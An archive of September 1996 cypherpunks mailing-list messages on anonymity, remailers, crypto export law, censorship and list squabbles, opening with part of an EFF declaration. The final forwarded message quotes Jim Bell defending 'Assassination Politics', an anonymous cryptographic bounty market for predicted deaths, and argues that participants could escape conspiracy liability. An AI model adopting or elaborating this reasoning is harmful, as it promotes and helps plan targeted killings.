   her real name as a "screen name" when communicating by e-mail with
   someone she knows personally, but use a pen name as a "screen name"
   when communicating with strangers.
   
   
   
   50. Pseudonymous accounts allow users to have a consistent identity in
   cyberspace without having to reveal their true identity to the people
   with whom they are communicating.
   
   
   
   Anonymous Internet Access Accounts:
   
   
   
   51. The use of "screen names" alone, however, does not pro vide
   complete anonymity to the user, because the user's service provider
   knows the true identity of the subscriber. To provide additional
   privacy, some Internet Service Providers and local BBS operators offer
   anonymous access accounts. That is, they do not require any
   identification in order to set up an account for communicating over
   the network. These accounts provide additional privacy and security to
   the user because even the service provider has no way to identify the
   true identity of the user.
   
   
   
   Anonymous and Pseudonymous Remailers:
   
   
   
   52. In addition to the use of screen names or anonymous ac cess
   accounts, there are special services that allow online users who
   normally communicate online under their real names to send particular
   messages anonymously or pseudonymously over the Internet. These
   services are known as pseudonymous and anonymous remailers, and they
   consist of software programs that run on computers connected to the
   Internet. When an online user sends e-mail to the remailer address,
   the remailer strips the identifying information from the message and
   then forwards the mail to its destination. The recipient receives mail
   that has no evi dence indicating its point of origin. Remailers can be
   used to send individual e-mail and to post messages to mailing lists
   or USENET newsgroups.
   
   
   
   53. "Pseudonymous remailers" are remailers that set up ac counts for
   repeated use. The operator of a pseudonymous remailer knows the
   account holder's real e-mail address but provides the account holder
   with a secret numeric identifier that is used whenever the account
   holder sends a message through the remailer. Other anonymous users,
   each with their own secret numeric identifier, can then reply to the
   anonymous message. This allows users to create a double-blind
   situation where two or more users can have an ongoing exchange without
   ever knowing the identity of the other users.
   
   
   
   54. Anonymous remailers do not require setting up any account with the
   service. Any Internet user can use these services by sending an e-mail
   message to the remailer, which will forward it anonymously to its
   final destination.
   
   
   
   55. Currently, there are over 20 public remailers that any online user
   may use free of charge.
   
   
   
   56. To prevent abuse of such remailers, there are programs available
   to the public, known as "kill files" and "bozo filters," that provide
   online users with the means to screen out anonymous messages if they
   desire. These programs reduce the likelihood of harm from misuse of
   anonymous remailers.
   
   
   
   Online Publishing Under Pseudonyms or Anonymously
   
   
   
   57. As in the case of e-mail, many publishers in the online medium
   choose to do so using pen names.
   
   
   
   58. For additional anonymity, some Internet Service Providers also
   allow persons and organizations to set up and maintain web pages
   anonymously.
   
   
   
   Anonymous Access Services:
   
   
   
   59. Conversely, many online users seek to receive information
   anonymously over the Internet. As a general rule, however, obtaining
   information anonymously over the Internet is difficult because every
   time an online user visits a web site, she leaves a digital "calling
   card" that reveals the address of the computer from which she is
   linked to the Internet, the address of the web site she last visited,
   the kind of computer she is using, and other details. Most web sites
   keep logs with this information on all of the visitors that access
   their sites.
   
   
   
   60. Many online users fear that their privacy will be invaded if data
   collected by web sites is misused, particularly where the user has no
   knowledge of the amount of data being collected by various web site
   operators.
   
   
   
   61. To assist online users in protecting their privacy, there are now
   services that allow online users to access information anonymously on
   the Internet. These services, called "anonymizers," serve as middlemen
   between the user and the par ticular pages he wants to retrieve. An
   anonymizer strips all references to the user's e-mail address,
   computer type, and previous page visited before downloading the web
   page to the user. If the user follows a link from a page accessed
   through the anonymizer, the linked page is also accessed anonymously.
   
   
   
   I, Shari Steele, declare under penalty of perjury that the foregoing
   is true and correct.
   
   
   
   Executed this ______ day of September, 1996.
   
   
   
   ________________________________
   
   SHARI STEELE
   
   STAFF COUNSEL
   
   ELECTRONIC FRONTIER FOUNDATION




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: temanuel@mecklermedia.com (Tom Emanuel)
Date: Thu, 26 Sep 1996 06:25:17 +0800
To: news_from_wschwartau@infowar.com
Subject: No Subject
Message-ID: <199609251905.PAA17803@pizza.mecklermedia.com>
MIME-Version: 1.0
Content-Type: text/plain


Please take me off this list or send instructions for so doing.


Tom Emanuel Vice President Publication Licensing, Mecklermedia Corporation,
20 Ketchum Street, Westport, CT 06880:fax: 203-454-5840; URL:
http://www.iworld.com; temanuel@mecklermedia.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: saunders@mcgraw-hill.com
Date: Thu, 26 Sep 1996 10:55:16 +0800
To: ceo@oss.net>
Subject: Re[2]: your mail
Message-ID: <199609251928.AA19822@interlock.mgh.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     
     whose list is this, and why am I on it? Please delete my name now.  


______________________________ Reply Separator _________________________________
Subject: Re: your mail
Author:  Robert Steele <ceo@oss.net> at CCNODE
Date:    9/25/96 11:55 AM



Requiring people to call Betty to tell her they sent email
is very low rent and will discredit the site.  Recommend
you delete that element.  Like putting roller skates on a
horse!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: probst@iro.umontreal.ca (David K. Probst)
Date: Thu, 26 Sep 1996 07:19:18 +0800
To: ceo@oss.net>
Subject: Re: Re[2]: your mail
Message-ID: <199609251931.PAA13139@griao.iro.umontreal.ca>
MIME-Version: 1.0
Content-Type: text/plain


Well, obviously the distribution list is the entire P-TRAK database from
Lexis/Nexis.

:-)

David K. Probst





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: billc@true.com (William Clinton)
Date: Thu, 26 Sep 1996 07:04:40 +0800
To: Robert Steele <ceo@oss.net>
Subject: RE: your mail
Message-ID: <01BBAAF6.D1ED7EE0@billc.true.com>
MIME-Version: 1.0
Content-Type: text/plain


  Likewise, please remove info@truecom from this list.

----------
From: 	Andrew Kantor[SMTP:ak@mecklermedia.com]
Sent: 	Wednesday, September 25, 1996 2:58 PM
To: 	John Norseen; Craig; Robert Steele
Cc: 	news_from_wschwartau@infowar.com; Betty G. O'Hearn; Winn Schwartau
Subject: 	Re: your mail 

I'm not sure what this list is or why I'm on it, but would whoever runs
this thing please remove me or send removal instructions. Thanks.

AK

------------------------------------------------------------
Andrew Kantor                                      ak@iw.com
Senior Editor, Internet World              http://www.iw.com
Otherwise, no one of consequence.      http://www.kantor.com
------------------------------------------------------------
   "Don't argue with the man who buys ink by the barrel."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 26 Sep 1996 09:33:16 +0800
To: pgf@acadian.net (Phil Fraering)
Subject: Re: Possible snake oil?
In-Reply-To: <Pine.SOL.3.93.960925154728.17155A-100000@stiletto.acadian.net>
Message-ID: <199609252236.PAA08577@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
> 
> 
> I ran across this at the web site of a New Orleans area web authoring
> company. I checked with a friend of mine of long standing on this list,
> and he assured me that the information was probably false.
> 
> (Here it is...)

[..]

> 
>      SSL & SHTTP Encrypted Web Systems (using the maximum
>      1024-bit encryption keys) 

[..]

> Well? Do _any_ of you know of a 1024-bit encryption standard for the world
> wide web currently in use? According to these people, they're using it.

In non-"export" SSL using RSA as the key-exchange algorithim 1024-bit
RSA keys can be used.  128-bit RC4 is most commonly used as the
symmetric algorithim in this case.

It's not snake oil.  I'd guess that some marketing-type
person found out enough about SSL to know that it uses
1024-bit RSA keys and thoght that since 1024 bits is bigger
than 128, they'd claim 1024 bit keys.  There's nothing really
wrong with that.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
If you don't see the fnords, they won't eat your packets.  If you do see the
fnords, they will eat your packets, so you won't see them.
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 26 Sep 1996 06:42:38 +0800
To: "Marc J. Wohler" <mwohler@ix.netcom.com>
Subject: Re: WHO IS MAKING A MOCKERY OF WHOM?
In-Reply-To: <199609251426.HAA02190@dfw-ix1.ix.netcom.com>
Message-ID: <Pine.LNX.3.94.960925154904.799A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Marc J. Wohler wrote:

> Date: Wed, 25 Sep 1996 10:29:23 -0400
> From: "Marc J. Wohler" <mwohler@ix.netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: WHO IS MAKING A MOCKERY OF WHOM?
> 
> At 05:55 PM 9/24/96 -0400, you wrote:
> >At 06:15 AM 9/24/96 -0700, Sandy Sandfort wrote:
> >
> >>C'punks,
> >>Time for another informal poll.
> >>
> >>On Mon, 23 Sep 1996, John Anonymous MacDonald wrote:
> >>> What a joy to make a public mockery of Tim Mayo!
> >>
> >>Do list members think Anonymous' posts make a public mockery of
> >>Tim May or Anonymous?  Let me know whose reputation you think 
> >>is enhanced or tarnished by these posts.  I'll post a summary to 
> >>the list in a week or two.  
> >
> 
> I vote for Anonymous.
> 
> Also, it seems evident that some non-anonymous posters aka KTOM seem to 
> understand how to *abuse*  our American freedom's but don't understand about
> *responsible*  use.
> 
> Is this a deliberate attempt to damage this list or is it that some folk
> just can't handle freedom?
> 
> M. J. Wohler
> 

I agree... the postings of Anonymous about "Timmy" pretty much just make
us want to killfile "Anonymous" more and more.  On the other hand (or
maybe its the same hand), Tim's response to these postings is basicly "I
have nothing to hide, take your best shot".  Personally, I havn't seen
Tim lie, cheat, steal, have sex with animals, etc., and until I do his
rep. is fine to me.

 --Deviant
Would it help if I got out and pushed?
                -- Princess Leia Organa






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 27 Sep 1996 16:58:59 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: WARNING: This Message Actually Contains a Question ReguardingCrypto!
In-Reply-To: <199609241649.LAA22238@mailhub.amaranth.com>
Message-ID: <9609252059.AA00824@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  I just recently downloaded copies of Blowfish & Ghost.
>
>  Does anyone have any experiance with these two algorithims?

Don't use GOST unless you think you can come up with some good S-boxes.  It's  
pretty much only out there for educational purposes.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Thu, 26 Sep 1996 07:51:55 +0800
To: cypherpunks@toad.com
Subject: Possible snake oil?
Message-ID: <Pine.SOL.3.93.960925154728.17155A-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain



I ran across this at the web site of a New Orleans area web authoring
company. I checked with a friend of mine of long standing on this list,
and he assured me that the information was probably false.

(Here it is...)

<begin included excerpt from web page)

[deleted] has one of the fastest and most powerful web networks in the
world,
with servers effortlessly handling in excess of two million hits a day,
and
resources spanning four seperate backbone providers on two continents
from North America to Europe. Entire networks at [deleted] are exclusively
dedicated to web hosting, electronic commerce and other applications;
separate servers are available with a plethora of advanced services
including: 

     SSL & SHTTP Encrypted Web Systems (using the maximum
     1024-bit encryption keys) 
     BSDI Unix 2.1 (our main net OS, proven to be superior to all),
     Windows NT, Windows 95, Macintosh, DOS, Linux and other
     platforms available. 
     RealAudio, VDOLive, CuSeeMe servers 
     RAID5 mirror networks in Europe 
     Access to [deleted] Advanced Systems Products (IASP) servers and
     scripts exclusively available to [deleted] clients, which include
shopping
     cart/automated ordering, web database systems, surveys &
     demographics, web page creation systems, ad & quote systems, and
     much more. 


=============
<end excerpt from corporate web page>

Well? Do _any_ of you know of a 1024-bit encryption standard for the world
wide web currently in use? According to these people, they're using it.

ObLegalQuestion:

Should I have been less coy about the corporation name?


Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Thu, 26 Sep 1996 16:52:07 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <Pine.SUN.3.91.960925121324.22297B-100000@eff.org>
Message-ID: <v03007800ae6f7401fffe@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Greg Kucharo <sophi@best.com> writes:
>I fail to see how the Executive can simply avoid the authority and
>oversight of the Judicial. Are there other circumstances of this? From
>my constitutional reading the Judiciary has the right to review any law
>passed by Congress.  The Executive only has the power to enforce, not to
>unilaterally pass rules unrelated to enforcement.

The executive branch cannot, but the legislative branch has the power to
restrict the jurisdiction of the courts in any way it wants to except
for cases in which the Supreme Court is given original jurisdiction (a
limited number of situations)  Ironically enough, Marshall's decision in
Marbury v. Madison was that the Judicial Act of 1789 which outlined the
jurisdiction of the court system was unconsitutional.  It is Congress
which gives the courts their jurisdiction, only the Supreme Court is given
original jurisdiction in the Constitution itself (interesting side note: The
case New York v. New Jersey regarding the ownership of Ellis island, I think,
was the first case of original jurisdction to be argued in the current
supreme court building if that tell you how often such cases come up...)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Thu, 26 Sep 1996 15:36:07 +0800
To: Stanton McCandlish <mech@eff.org>
Subject: Re: Dyson on anonymity (in WSJ article on our challenge to GA net law)
In-Reply-To: <199609252017.NAA24875@eff.org>
Message-ID: <3249BC0D.7C6368F4@best.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm glad to see that Ms. Dyson has come around to our way of
thinking:-).  
Stanton McCandlish wrote:
> 
> FYI:
> 
> [...]
>    Esther Dyson, president of high-tech publisher EDventure
>    Holdings Inc. and chairwoman of the Electronic Frontier
>    Foundation, a high-tech civil liberties organization that
>    is a co-plaintiff in the lawsuit, calls the Georgia law
>    "brain-damaged and unenforceable," and adds: "How are they
>    going to stop people from using fake names? Anonymity
>    shouldn't be a crime. Committing crimes should be a crime."
> [...]
> 
> --
> <HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
> </A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
> </A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
> </A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 26 Sep 1996 07:07:06 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Medical Data
In-Reply-To: <Pine.SOL.3.93.960925092456.13583A-100000@stiletto.acadian.net>
Message-ID: <199609252016.QAA03115@nrk.com>
MIME-Version: 1.0
Content-Type: text


Phil Fraering sez:
> Of course, with the really big problems with this stuff, drug
> interactions, there's still no system for a doctor to find out what you're
> on thanks to another doctor. Which is why it's very important to always
> use the same pharmacist.

So the pharmacist can sell that data about you to the drug
and insurance companies........




-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Thu, 26 Sep 1996 15:39:00 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <Pine.SUN.3.91.960925121324.22297B-100000@eff.org>
Message-ID: <3249BDB5.1A39AD0D@best.com>
MIME-Version: 1.0
Content-Type: text/plain


I fail to see how the Executive can simply avoid the authority and
oversight of the Judicial. Are there other circumstances of this? From
my constitutional reading the Judiciary has the right to review any law
passed by Congress.  The Executive only has the power to enforce, not to
unilaterally pass rules unrelated to enforcement.

Declan McCullagh wrote:
> 
> At today's SAFE crypto hearing in the House, Congressperns quizzed
> Gorelick about what the fuck the administration is trying to do by having
> their lackies attach amendments to the omnibus export act that would
> prevent judicial review of Commerce Dept export control decisions. It's
> already cleared the House.
> 
> "no court shall have power or jurisdiction to review any such decision by
> an action in the nature of mandamus or otherwise."
> 
> Bastards.
> 
> -Declan
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Gairson <erp@digiforest.com>
Date: Thu, 26 Sep 1996 12:44:13 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Public Schools
In-Reply-To: <ae6e3206000210046fde@[207.167.93.63]>
Message-ID: <Pine.LNX.3.91.960925163750.3944B-100000@digital.digiforest.com>
MIME-Version: 1.0
Content-Type: text/plain


> Nothing, but Dmitri has "different" standards of what is list-relevant than
> many of us do.

Ok, just wondering on that *shrug*.

> 
> >So, basically your saying, since my parents cannot afford to pay for a
> >private school for me, we are genetically inferior to those who can?
> >Because hate tell ya, but I've ran into some major idiots that go to
> >private schools.  Also to consider that from the school I go to, last
> >year we had two perfect sat scores (no problems missed).
> 
> A minor point: An 800 SAT or Achievement score does _not_ mean "no problems
> missed." There is some threshold for the percentage of right answers, which
> varies from year to year and from test to test, above which the score is
> marked "800." Don't ask me why they do this. (*)

They did it because, the American students, where scoring worse than the 
Japanese students.  And the with the 1600 they got a copy of the 
questiosn and answers, and the questions they missed, they didn't miss any.
So...

> 
> This should give you more hope and more determination to get a few 800s
> when you take the exams.
> 

Should, doesn't much, but should.

> range (x10, of course). Of course, as Roger Gregory puts it, "Mensa is the
> scum of the cream of the crop.")

And he is partially right on that >)

almost wholly..  But I know some non scum that are so *shrug*

ok
buh bye

Erp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 27 Sep 1996 00:29:46 +0800
To: cypherpunks@toad.com
Subject: 45K fine  for possession
Message-ID: <v03007804ae6f4b9596c9@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: vinnie@apple.com (Unverified)
Mime-Version: 1.0
Date: Wed, 25 Sep 1996 12:18:07 -0700
To: rah@shipwright.com
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Subject: 45K fine  for possession
Status: U

http://www.nando.net/newsroom/ntn/info/092596/info13_25205.html

Singapore fines first resident for Internet obscenity


Copyright (c) 1996 Nando.net
Copyright (c) 1996 The Associated Press

SINGAPORE (Sep 25, 1996 08:48 a.m. EDT) -- A Singapore resident has been
fined for downloading obscene pictures from the Internet, the first such
case since the government announced it will censor what people can see on
the global computer network.

Lai Chee Chuen, 41, pleaded guilty Monday to charges of collecting of
pornographic pictures from the Internet and of possessing Penthouse, a
magazine banned in Singapore, the Straits Times newspaper reported today.

It said Lai was fined $43,900.

In July, the government announced rules for censoring the Internet. By a
Sept. 15 deadline, the three local Internet providers installed powerful
computers blanking out some of the sites that showed prohibited pornography
or anti-government material.

Police seized the pictures from Lai's home in July 1995. Laws covering
computer pornography have yet to be drawn up, so the government prosecuted
Lai under a general law against possession of obscene visual images.

Lai's conviction served to demonstrate that the government's Internet
regulations are no idle threat. The Times, a pro-government newspaper,
published Lai's picture on the front page to emphasize the point.

Neither Lai nor police were available for comment.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 26 Sep 1996 08:37:13 +0800
To: pjb@ny.ubs.com
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <199609251240.IAA14357@sherry.ny.ubs.com>
Message-ID: <199609251555.QAA00118@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



pjb@ny.ubs.com writes:
> Adam, you know the german government did not win this one, and i know that
> they did not win, 

Agreed.

> my point was, will they, and other governments take this as a win
> and be encourgaged to press their luck with someone else.

They are claiming a victory, and the net is claiming a victory.  The
net is correct, they are deluding themselves.

They might take what they think is a victory as an encouragement to
try the same thing on some other site based on another topic, I agree
with your synopsis.

I think more would be gained if they could be made to face up to their
loss.  If they tried to block all of the mirrors for instance, I think
this would be marvelous, for the obvious reason that it would backfire
on them heavily.

My point was therefore to suggest methods of trying to ensure that the
relevant people in german politics and the press could be made aware
of their loss.

I am wondering how someone in Germany could engineer the necessary
contacts.  By demonstrating to a journalist how it has not been
stopped.  Perhaps by writing to the politicians responsible for the
scare listing the number and jurisdictions of sites?  These are some
things that I think it might be fruitful for someone in Germany to
write to their polticians and journalists.

If one of the Germans who have posted to keep us up to date on this
topic could undertake to do this, I think they would be doing
something very useful for the cause of free speech.  For xs4all
management to write the same people a letter saying the same might
also be useful.

It needs some Germans to shout loudly on this.  Perhaps there are some
pressure groups who are pro-censorship who could be `fed' this
information, and encouraged to pressure the German politicians, to
also inadvertently help out the cause of free speech.

I'm trying to work up some _action_ here, any takers, German cpunks?

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 26 Sep 1996 04:13:18 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: Esther Dyson and anonymity
Message-ID: <199609251656.QAA03196@pipe3.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


You're right, I was too mindlessly rantish about Esther Dyson's WSJ
comments. 
 
 
However, I bought Esther a bottle of champagne in NYC a few days ago, sent
it to her table signed "An Admiring Cypherpunk."  She came over to say
hello, and we chatted a a bit about her recent messages on Cypherpunks,
which I complimented her for posting. 
 
 
She still doesn't know my name, I said I was "Anonymous." She grinned and
staggered away. 
 
 
The champagne brought her over to the side of Anonymous, that's it. 
 
 
AYA 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 26 Sep 1996 09:24:59 +0800
To: adamsc@io-online.com
Subject: Re: Taking crypto out of the U.S.
In-Reply-To: <19960925060114140.AAA186@IO-ONLINE.COM>
Message-ID: <199609252211.RAA02676@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


> >> Soon I am going to be going overseas to Japan, and I want to take
> >> my notebook with me so I can keep up with everything, however, I have
> >> encrypted my hard drive and usually encrypt my mail.  Is this in
> >> violation of the ITAR to keep everything the same when I go over?

Gentlemen, us customs does not give shit about what you take out
on your diskettes.

When I went to Russia recenty, I took PGP for DOS, and no one gave
me any problem.

IANAL

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PhneCards@aol.com
Date: Thu, 26 Sep 1996 13:09:17 +0800
To: cypherpunks@toad.com
Subject: Re: An idle thought on CBC and block lengths
Message-ID: <960925181213_529562658@emout15.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Did you know this company is using your email address as part of
an unlawful email bomb?

I would advise you to write to them at cypherpunks@toad.com
and owner-cypherpunks@toad.com and advise them to stop
using your email address for this type of activity.

It is illegal to use a invalid return email address.  If this continues, I
will
be forced to prosecute the return email address - which they are
making to look like you.

Below is the letter that I received in my email box
=================================================

In a message dated 96-09-25 15:52:17 EDT, you write:

>Subj:	An idle thought on CBC and block lengths
>Date:	96-09-25 15:52:17 EDT
>From:	osborne@gateway.grumman.com (Rick Osborne)
>Sender:	owner-cypherpunks@toad.com
>To:	cypherpunks@toad.com
>
>So I was sitting bored at home and thinking to myself: CBC is cool.
>Without the key, you're screwed because a single bit error propagates
>throughout the entire message.  But then I was thinking, yeah, but you can
>still eventually get the ONE key.  So I began to wonder what the difference
>in security is between encrypting an entire M with just one K in CBC, or
>encrypting M with permutations of K over specific block lengths.
>
>On the one hand you've got just one key, which makes it that much harder to
>find in the keyspace.  On the other hand, If evil interloper Eve gets her
>hands it, she has to find all of the keys to get all of M.  (Assuming she
>is using brute force and can't necessarily find the master K to permute
>into the subkeys.)
>
>The downsides are of course that on the one side you've got just one key,
>and once you get it, you get M.  But on the other hand, you can get any one
>part of the message with less difficulty because of the higher number of
>keys.  And, of course, if your master K is easy to brute force, then it's
>actually worse than the first option.
>
>Does anyone have opinions / knowledge of which is better?
>
>
>____________________________________________________________
>Rick Osborne                     osborne@gateway.grumman.com
>"The universe doesn't give you any points for doing things that are easy."
>
>
>
>----------------------- Headers --------------------------------
>From cypherpunks-errors@toad.com  Wed Sep 25 15:51:46 1996
>Return-Path: cypherpunks-errors@toad.com
>Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by
>emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA04207 for
><phnecards@aol.com>; Wed, 25 Sep 1996 15:51:43 -0400
>Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4)
>	id AA27411; Wed, 25 Sep 1996 13:47:22 -0600
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA16059
for
>cypherpunks-outgoing; Wed, 25 Sep 1996 05:57:39 -0700 (PDT)
>Received: from gateway.grumman.com (gateway.grumman.com [192.86.71.8]) by
>toad.com (8.7.5/8.7.3) with SMTP id FAA16054 for <cypherpunks@toad.com>;
Wed,
>25 Sep 1996 05:57:32 -0700 (PDT)
>Message-Id: <3.0b19.32.19960925085644.0068cb90@gateway.grumman.com>
>X-Sender: osborne@gateway.grumman.com
>X-Mailer: Windows Eudora Pro Version 3.0b19 (32)
>Date: Wed, 25 Sep 1996 08:56:45 -0400
>To: cypherpunks@toad.com
>From: Rick Osborne <osborne@gateway.grumman.com>
>Subject: An idle thought on CBC and block lengths
>Mime-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PhneCards@aol.com
Date: Thu, 26 Sep 1996 13:32:48 +0800
To: cypherpunks@toad.com
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <960925181241_529563116@emout20.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Did you know this company is using your email address as part of
an unlawful email bomb?

I would advise you to write to them at cypherpunks@toad.com
and owner-cypherpunks@toad.com and advise them to stop
using your email address for this type of activity.

It is illegal to use a invalid return email address.  If this continues, I
will
be forced to prosecute the return email address - which they are
making to look like you.

Below is the letter that I received in my email box
=================================================

In a message dated 96-09-25 14:05:23 EDT, you write:

>Subj:	Re: Hallam-Baker demands more repudiations or he'll write!
>Date:	96-09-25 14:05:23 EDT
>From:	jimbell@pacifier.com (jim bell)
>Sender:	owner-cypherpunks@toad.com
>To:	bdavis@thepoint.net (Brian Davis)
>CC:	cypherpunks@toad.com, jf_avon@citenet.net
>
>At 11:50 PM 9/24/96 -0400, Brian Davis wrote:
>>On Tue, 24 Sep 1996, Rich Burroughs wrote:
>>
>>> <AP stuff>
>>> Anyone who mistakes the lack of "repudiations" for AP on the list for
some
>>> kind of tacit approval is not getting the whole picture, IMHO.  
>>> 
>>> Is this how journalists do their research nowadays -- "give me some info
>or
>>> I'll write something really bad about you that you'll regret?"  Cool.  I
>>> guess I thought there might still be some kind of pursuit of the truth
>>> involved.
>>> 
>>> I personally don't have the time or energy to contribute to the AP
>threads.
>>> That != approval for the idea.
>>> 
>>> I hope you include your above quote in your piece.
>>> 
>>
>>Amen to that.  Add that at least one lawyer (and former prosecutor) on 
>>the list is confident that successful prosecutions will ensue is AP ever 
>>gets off the ground. 
>
>I don't doubt that there will be harassment.  (you can't deny that charges 
>would be brought even if it is tacitly agreed that no crime has been 
>committed; "the harassment-value" of such a prosecution would be desired 
>even if there is ultimately an acquittal.)  AP will resemble, more than 
>anything, gambling.  While gambling is illegal in some areas, it is quite 
>legal in others and there is no reason to believe that locales can't be 
>found in which an AP system could operate legally.
>
>Make American laws apply everywhere?  That'll be hard to justify, unless you

>want to unleash a world where an all people can be subject simultaneously to

>the laws of EVERY country, should they choose to enforce them!  Would you 
>like to be arrested in Red China for something you said years earlier in 
>America about their leadership? 
>
> And are you ignoring the fact that the intentional isolation of one 
>participant from the knowledge of the actions and even the identity of the 
>others makes opportunities for prosecution on "conspiracy" charges mighty 
>slim.  And since AP can operate across traditional jurisdictional 
>boundaries, you're going to have to explain how you can prosecute Person A 
>in Country B for giving a donation to an organization in Country C, to be 
>paid to a person D in country E for correctly predicting the death of person

>F in country G, particularly when none of the identities of these people or 
>countries can be easily known given a well-crafted cryptographic and 
>message-routing system.  
>
>  Further, as you probably know as well as any, in order (at least, 
>supposedly!) to get a conviction you need to prove "mens rea," or "guilty 
>mind," and I suggest that none of the more passive participants in the AP 
>system have that.  (The ones who DON'T pick up a gun, knife, bomb, poison, 
>etc.)  Sure, they are aware that somewhere, sometime, somebody _may_ commit 
>a crime in order to collect a lottery, but they don't know who, what, when, 
>where, or how this will occur, if at all. (either before or after the fact!)

>  In fact, since it is possible for a target to collect the reward himself 
>(to be directed toward his designee, obviously) by committing suicide and 
>"predicting" it, it isn't certain to the other participants that there has 
>even been any sort of crime committed!
>
>Based on the mens rea requirement, I propose that there is plenty of room 
>for most of the participants to reasonably claim that they are guilty of no 
>crime.  They have carefully shielded themselves and others from any guilty 
>knowledge, and presumably they are entitled to protect themselves in this 
>way.  Morally, you could argue that these people are countenancing something

>nasty, in the same sense that somebody could equally well argue that if you 
>buy a cheap shirt in Walmart you're partly responsible for sweatshop labor 
>in El Salvador.  True, I suppose, but moral guilt does not always translate 
>into legal guilt.
>
>
>> And yes, I've read Jim Bell's manifesto.  The fact 
>>that no lawyer has dissected it from a legal standpoint has been used by 
>>Mr. Bell as support for the propostion that it is legal.
>
>I suggest that there is a greater likelihood that the "powers that be" will 
>just abandon all pretense of legality, and attempt to strike at the 
>participants if they can find them without benefit of any sort of trial. 
>This is a more plausible conclusion, because it cuts through all of the 
>legal difficulties which would hinder prosecution.  In effect, a low-level 
>undeclared war.  
>
>
>Jim Bell
>jimbell@pacifier.com
>
>
>----------------------- Headers --------------------------------
>From cypherpunks-errors@toad.com  Wed Sep 25 11:04:24 1996
>Return-Path: cypherpunks-errors@toad.com
>Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by
>emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id LAA03061 for
